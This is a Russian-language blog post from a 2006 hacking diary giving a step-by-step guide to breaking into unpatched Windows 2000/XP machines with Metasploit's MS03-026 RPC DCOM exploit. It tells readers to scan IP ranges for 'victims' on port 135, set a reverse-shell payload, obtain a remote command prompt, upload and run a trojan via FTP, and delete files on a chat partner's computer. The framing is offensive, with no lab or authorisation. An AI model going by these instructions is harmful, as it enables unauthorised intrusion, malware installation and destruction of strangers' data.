-Видео

Гоним
Смотрели: 39 (0)

 -Подписка по e-mail

 

 -Поиск по дневнику

Поиск сообщений в _Hacking_

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 11.05.2006
Записей:
Комментариев:
Написано: 4992


Взлом пк эксплоитом

Четверг, 11 Мая 2006 г. 20:47 + в цитатник
Metasploit Framework – это среда, предназначенная для разработки и тестирования эксплоитов. Как раз то, что нам нужно, качай последнюю версию с http://www.metasploit.com/projects/F...sfopcode.html Забыл сказать, что эксплоит – это программа или код, эксплуатирующая(ий) какую-либо уязвимость в программном продукте, короче что-то в этом роде. Metasploit (далее MFS ) выпускается, как для * nix платформ, так и для Win , распространяется бесплатно. Нам нужна версия под Windows . Установка проста, запускаем экзешник, жмем кнопку « Next ». Когда MFS установиться, запустится окно MFSConsole , не торопись его закрывать, подожди пока в нем не появиться консоль mfs >, после этого можешь нажимать « Finish ». Работать с консолью легко, главное привыкнуть и выучить несколько команд.

Я расскажу, как это делать на примере использования одного эксплоита, потому что действия с другими эксплоитами аналогичны. И так, будем использовать известную дыру RPC DCOM в Win 2000 XP . Зная что дыра работает на 135 порту, найдем жертву. Для этого я использовал знаменитый сканер XSpider . Выбираем раздел «Поиск», вводим диапазон IP -адресов, указываем порт 135, жмем кнопку «Старт». IP -адреса помеченные крестиком – потенциальные жертвы.

Теперь вернемся к MFS . Вводим команду show exploits , появиться список
доступных эксплоитов (впечатляет правда?).

Для нашей задачи нужен msrpc_dcom_ms03_026. Печатай команду use msrpc _ dcom _ ms 03_026 , так мы переходим в среду эксплоита. Командой show options , получаем список опций, необходимых для успешной работы. Затем нужно ввести действие, которое должен сделать эксплоит. Делается это так, командой show PAYLOADS , смотрим список, затем задаем командой set PAYLOAD winreverse . Цели для которых используется эксплоит смотрим командой show TARGET , задается командой set TARGET 0 , но в данном случае указывать цель не надо, т.к. она одна. Порт атакуемого задается командой set RPORT 135 , также в данном случае нам не надо его указывать, т.к. он задан по умолчанию. Осталось ввести адрес жертвы, делается это командой set RHOST 172.19. XX . X , и командой set LHOST 172.34. XX . X задаем свой IP -адрес, который можно найти сделав двойной клик по двум мониторчикам в закладке «Сведения». Все, эксплоит готов. Запускается он командой exploit и если система у жертвы не пропатчена или не защищена, ты получишь доступ к командной строке удаленного компьютера, на экране должно высветится C : WINDOWS system 32>_ . Дальше фантазируй. Подскажу лишь, что можно поставить у себя не большой FTP -сервер и с помощью встроенного FTP -клиента, запущенного тобой на взломанной тачке, закачать Троян, и в последствии запустить его, тем самым получить полный доступ к системе.

Ну как понравилось? Мощно! Прикинь, ты базаришь с каким-нибудь чуваком-ломаком по аське, смотришь его IP , подключаешься к нему и пишешь «А что там за фильм у тебя на диске D : под названием Video . avi , он же тебе не нужен? (следует команда D :> del Video . avi )». Представь удивленные глаза чувака-ломака, когда он не обнаружит этого фильма. На этом РЕСПЕКТ вам всем
Рубрики:  Взлом


Процитировано 1 раз

IVENGO   обратиться по имени Вторник, 19 Октября 2010 г. 19:34 (ссылка)
у меня пишет show exploits
"show" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом. что делать?
Ответить С цитатой В цитатник
 

Добавить комментарий:
Текст комментария: смайлики

Проверка орфографии: (найти ошибки)

Прикрепить картинку:

 Переводить URL в ссылку
 Подписаться на комментарии
 Подписать картинку